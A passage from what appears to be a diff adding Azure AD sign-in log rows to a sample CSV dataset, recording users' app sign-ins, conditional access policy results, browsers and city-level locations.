'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",1cac618b-0ecf-4561-b4ad-0c53e3aa2400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1cac618b-0ecf-4561-b4ad-0c53e3aa2400,SigninLogs,Sucess,33.0175209,35.44601059
+1654,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:17.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5ef5316a-deee-4f03-8fd7-4abf716c0000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5ef5316a-deee-4f03-8fd7-4abf716c0000,SigninLogs,Sucess,33.0175209,35.44601059
+1655,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:14.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a051104a-c510-4698-b8ef-68e2acee2200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a051104a-c510-4698-b8ef-68e2acee2200,SigninLogs,Sucess,33.0175209,35.44601059
+1656,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffd1469f-609a-0000-5683-47b9a51ec72d,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71dda831600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,88812ca6-4188-4e59-83ab-d71dda831600,SigninLogs,Sucess,41.90428925,-85.99833679
+1657,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:25.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9e7e7868-c3b4-4782-9512-091ad5c493a2,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71d5c851600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,88812ca6-4188-4e59-83ab-d71d5c851600,SigninLogs,Sucess,41.90428925,-85.99833679
+1658,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:27.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,159a05eb-1fc0-4a33-b225-4bd1c3d1ad8a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71dbe851600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,88812ca6-4188-4e59-83ab-d71dbe851600,SigninLogs,Sucess,41.90428925,-85.99833679
+1659,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:27.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,159a05eb-1fc0-4a33-b225-4bd1c3d1ad8a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71dbe851600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,88812ca6-4188-4e59-83ab-d71dbe851600,SigninLogs,Sucess,41.90428925,-85.99833679
+1660,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:15.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,42196f9c-f7fd-489b-abcf-f0455d8b9344,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",189268ff-d871-4dc4-914e-2c9617081700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,189268ff-d871-4dc4-914e-2c9617081700,SigninLogs,Sucess,33.7984581,-84.38828278
+1661,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:06.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 